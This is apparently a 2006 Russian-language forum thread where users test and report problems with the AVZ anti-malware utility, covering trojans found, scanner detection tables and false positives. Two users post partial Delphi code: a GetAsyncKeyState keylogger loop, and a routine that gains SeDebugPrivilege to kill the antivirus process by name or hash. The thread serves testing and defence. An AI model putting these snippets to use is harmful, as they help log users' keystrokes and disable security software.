Этот зверь создает в папке C:\WINDOWS\Downloaded Program Files файлы, которые ''простым'' способом не удалишь...
Последний из них, например, AUTO_299_N.exe.
Кто-нибудь уже сталкивался?
Этот зверь создает в папке C:\WINDOWS\Downloaded Program Files файлы, которые ''простым'' способом не удалишь...
Последний из них, например, AUTO_299_N.exe.
Кто-нибудь уже сталкивался?
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
наверно XP непатченая...Сообщение от DimaT
Да, SP2 не стоит, но обновления делаются регулярно...
Но Trojan.Win32.Dialer.lw ''пролез'' не из-за этого...
Прстая функция GetAsyncKeyState.
////////////////////////////////////////////////////
procedure TForm1.Timer1Timer(Sender: TObject);
........
begin
keyscount:=0;
For i:= 0 to 255 do
begin
key:=GetAsyncKeyState(i);
if key<>0 then
begin
keys[keyscount]:=i;
inc(keyscount);
end;// key<>0
end;// for i
.......
{логим в файл}
end;
//////////////////////////////
Никакой реакции.
Anti-keylogger v7.2 (http://www.bezpeka.biz) - тоже никак не отреагировал.
И еще несколько вопросов:
1) Можно ли сохранять выбранные настройки (очень понравился параноидальный уровень эвристического анализатора) или загружать их из скрипта? - т.к. при перезапуске программы они загружаются по-умолчанию.
2) Нельзя ли AVZGuard загружать список исполняемых файлов (например из заранее сформированного txt-файла с их полными путями), а то их по-одному как-то неудобно....
(Классная прога! Большое спасибо!)
настройки можно задавать через скрипт (например командой вида "SetupAVZ('ScanProcess=N');") или параметры командной строки. в хэлпе к программе про это написано.
Регулярно сканирую комп AVZ последней версией и базы обновляю регулярно. Никакой заразы не находит, что конечно радует!
После последнего формата и переустановки ОС всё настроил, поставил себе Acronis TrueImage 9.0 и сделал имидж жесткого. С тех пор в логе AVZ всё время вижу:
C:\Program Files\Acronis\TrueImage\MediaBuilder.exe Invalid file - not a PKZip file
C:\Program Files\Acronis\TrueImage\tishell.dll Invalid file - not a PKZip file
C:\Program Files\Acronis\TrueImage\TrueImage.exe Invalid file - not a PKZip file
C:\Program Files\Acronis\TrueImage\TrueImageMonitor.exe Invalid file - not a PKZip file
C:\Program Files\Acronis\TrueImage\TrueImageTerminal.exe Invalid file - not a PKZip file
C:\Program Files\Common Files\Acronis\TrueImage\TrueImageNotify.exe Invalid file - not a PKZip file
C:\Program Files\Common Files\Acronis\TrueImage\TrueImageService.exe Invalid file - not a PKZip file
Что я опять сделал не так?
Копирование файла в карантин сейчас не различает файлы, к которым нет доступа, и файлы, которых не удалось найти.
Пример. Копирую в карантин по списку dll от Look2Me.
Надо расширить диагностикуКод:Процесс добавления файлов запущен Процесс добавления файлов завершен
А то создается ложное ощущение, что файла нет.Код:Процесс добавления файлов запущен xxx.dll - нет доступа yyy.dll - файл не найден Процесс добавления файлов завершен
Отошлите этих инвалидов Олегу - пусть выяснит, почему программа их за архивы принимает.
Ругательство на C:\Program Files\Acronis\TrueImage\MediaBuilder.exe и аналогичные - нормальное явление, у них в хвосте EXE файла есть данные, по виду очень похожие на ZIP архив ...
to _HEKTO_
Диагностику расширю, это нетрудно
to Mad Scientist
на такой пример почти ни одно приложение не реагирует - этот пример (или похожий) я приводил в моей статье за прошлый год в КомпьютерПресс как пример простого и пости недетектируемого логгера. Поймать его можно только мониторингом всей системы
1. Пока можно скриптом, скоро приделаю поддержку профилей настроек
2. Да, такое возможно - но AVZ запустит каждую программу из списка, т.к. разрешение дается на процесс, а не на все процессы заданного исполняемого файла
to DimaT
Файлик c:\windows\system32\service.exe нужно на анализ выслать - в XP точно такого файла в System32 нету, вероятно это троян.
K сожалению так и не дождался ценных указаний.
Пришлось удалять дедовским способом.
Почему AVZ нe ''осилил'' Trojan Downloader.VХА cfgmngr32.dll ?
Причем, cfgmngr32.dll в system32 (не путать с cfgmgr32.dll) не удавалось удалить даже в safe mode, так как кроме екслплорера он был завязан на winlogon.
Олег, знатоки,
Хотелось бы услышать разбор полетов...
Как бы это сделали Вы ?
Одновременно написали посты...
На [email protected] ушла посылка...
Хотелось бы узнать о результатах...
Последний раз редактировалось DimaT; 22.04.2006 в 23:18.
При попытке убрать service.exe с помощью Unlockerа выдало:
Выбрал Да.Ошибка
---------------------------
Удаление объекта невозможно
Выполнить операцию удаления при следующей загрузке системы?
---------------------------
Да Нет
По поводу service.exe - это троян, сжат UPX ... причем из новых, его толком не детектит никто:
AntiVir 6.34.0.24 04.20.2006 Heuristic/Trojan.Downloader
Avast 4.6.695.0 04.21.2006 no virus found
AVG 386 04.22.2006 no virus found
Avira 6.34.0.56 04.22.2006 no virus found
BitDefender 7.2 04.22.2006 BehavesLike:Win32.Backdoor
CAT-QuickHeal 8.00 04.21.2006 no virus found
ClamAV devel-20060202 04.22.2006 no virus found
DrWeb 4.33 04.22.2006 DLOADER.Trojan
eTrust-InoculateIT 23.71.136 04.22.2006 no virus found
eTrust-Vet 12.4.2171 04.21.2006 no virus found
Ewido 3.5 04.22.2006 no virus found
Fortinet 2.71.0.0 04.22.2006 suspicious
F-Prot 3.16c 04.21.2006 no virus found
Ikarus 0.2.59.0 04.21.2006 no virus found
Kaspersky 4.0.2.24 04.22.2006 no virus found
McAfee 4746 04.21.2006 no virus found
NOD32v2 1.1502 04.22.2006 no virus found
Norman 5.90.16 04.21.2006 W32/Malware
Panda 9.0.0.4 04.22.2006 Suspicious file
Sophos 4.04.0 04.22.2006 no virus found
Symantec 8.0 04.22.2006 no virus found
TheHacker 5.9.7.133 04.22.2006 no virus found
UNA 1.83 04.21.2006 no virus found
VBA32 3.11.0 04.22.2006 no virus found
----
Так что файл этот нужно прибить, через отложенное удаление AVZ.
Олег, два вопроса:
1) Можно ли просто добавить возможность поиска и нейтрализации RootKit, скажем, в меню "Файл" ? Неудобно только ради этой цели запускать "обычное" сканирование.
2) Англоязычная версия еще планируется или вычеркнута из планов?
Месть - мечта слабых, прощение - удел сильных.
Поддержать проект можно здесь
Понял.
Спасибо. Сделаю, если Unlocker не выполнил свои обещания.
А замаскировался хорошо, 2001 года...
Хотелось бы все-таки услышать анализ, рекомендации, разбор действий по остальным моментам...
Anti-keylogger v7.2 (http://www.bezpeka.biz)
1) Устанавливаю и запускаю Anti-keylogger.
Запускаю AVZ.
AVZ -> сервис -> диспетчер процессов =>
Anti-keylogger заносит его в черный список.
После этого AVZ умирает. Запуск после этого AVZGuard тоже не помогает.
Если выйти из AVZ, то больше он не запустится(Сообщение винды "Ошибка в приложении...")
Консоль avz.exe AG=Y - отказано в доступе.
Возвращаюсь к SnapShot'у виртуалки
2) Устанавливаю и запускаю Anti-keylogger.
Запускаю AVZ. Запускаю AVZGuard.
AVZ -> сервис -> диспетчер процессов =>
Anti-keylogger заносит его в черный список.
аналогично...
Возвращаюсь к SnapShot'у виртуалки
3) Устанавливаю и запускаю Anti-keylogger.
Запускаю AVZ.
Параметры-> блокировать работу rootkit в обоих режимах-> доходит до "1.2 Поиск перехватчиков API, работающих в KernelMode" -> смотрим на синий экран смерти (причина - AVZ.exe и дальше дамп пошел.. (XP SP II))
Похоже Anti-keylogger v7.2 использует Root-Kit технологию, устанавливая свой драйвер для невидимости(C:\WINDOWS\system32\drivers\krnl_akl.s ys) и для того, чтобы подавлять процессы в черном списке.
(AVZ определяет перехват API и в User и Kernel Modes, в Kernel Mode перехватчик не определяется)
AVZ считает подозрительным файл hide.dll который
WMware Workstation 5.5 ставит в гостевую виртуальную машину(Install VMware Tools).
Извиняюсь, не hide.dll a hook.dll
C:\Program Files\VMware\VMware Tools\hook.dll
(AVZ считает его подозрительным)
http://virusinfo.info/showthread.php?t=5331
Олег, сделай наконец что бы выдавалось предупреждение о не латинских символах в именах файлов
Я решил попробовать написать что-то, что могло бы блокировать работу програм и в частности
AVZ, благо он свой процесс не прячет и его можно дернуть FProcessEntry32 (в Delphi)
/////////////////////////////////////////////////////////
function KillTask(ExeFileName: string): integer;
const
PROCESS_TERMINATE=$0001;
var
...
FProcessEntry32: TProcessEntry32;
begin
result := 0;
...
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeF ile)) =
UpperCase(ExeFileName)) ... then
Result := Integer(TerminateProcess(OpenProcess(
PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
{if not FoundProcess then MessageDlg('Program not running.', mtWarning, [mbOK], 0);}
CloseHandle(FSnapshotHandle);
end;
///////////////////////////////////////////////////////////
для системных процессов
//////////////////////////////////////////////////////////
function ProcessTerminate(dwPID:Cardinal):Boolean;
var
...
begin
Result:=false;
// "Добавляем" привилегию SeDebugPrivilege
....
// Для начала получаем токен нашего процесса
...
// Получаем LUID привилегии
.....
// "Добавляем" привилегию к нашему процессу
AdjustTokenPrivileges(hToken,false,tkp,SizeOf(tkp) ,tkp,ReturnLength);
if GetLastError()< > ERROR_SUCCESS then exit;
// Завершаем процесс. Если у нас есть SeDebugPrivilege, то мы можем
// завершить и системный процесс
// Получаем дескриптор процесса для его завершения
hProcess := OpenProcess(PROCESS_TERMINATE, FALSE, dwPID);
if hProcess =0 then exit;
// Завершаем процесс
if not TerminateProcess(hProcess, DWORD(-1)) then exit;
CloseHandle( hProcess );
// "Удаляем" привилегию
tkp.Privileges[0].Attributes := 0;
AdjustTokenPrivileges(hToken, FALSE, tkp, SizeOf(tkp), tkp, ReturnLength);
if GetLastError() < > ERROR_SUCCESS
then exit;
Result:=true;
end;
//////////////////////////////////////////////////////
(Все взято из Delphi World)
//////////////////////////////////////////////////////
Дальше пихаем это KillTask в таймер с интервалом в 1.
Но, допустим, поменяв avz.exe на avz2.exe KillTask(ExeFileName: string) уже не прокатит.
Тогда сканим хоть тем же KillTask, заносим новые процессы с полным именем используя
EnumProcessModules (вот зачем этот нужен - не знаю, но без него не работает) и
GetModuleFileNameEx
В StingList, проверяя каждый новый процесс на MD5. Как только совпадают - убиваем при помощи
ProcessTerminate(dwPID:Cardinal);
Все. Теперь AVZ не запускается и с avz.exe AG=Y.
Загрузка процессора(AMD Athlon 2400) такой прогой - 0%(по таск менеджеру)
Вообщем задолбать можно все что видно, кроме критических процессов, т.к. они приведут
экстреннму завершению работы системы.
Пробовал AVZ пожать UPX - не получилось. Вообщем надо AVZ убирать из списка процессов -
делать из него что-то вроде руткита, чтобы он скрывал свой процесс и свои файлы, возможно
модифицировал их (как Morfine), чтобы его невозможно было определить
ни при копировании, ни при запуске, ни при работе(что, наверное, сложнее).
Спасибо, что я мог принять хоть какое-то участие (я так думаю) в тестировании, тем более я слаб в программировании и это пойдет мне на пользу (извините, что мессага такая большая вышла).
Последний раз редактировалось Dream Worker; 25.04.2006 в 03:32.
Ваши права в разделе
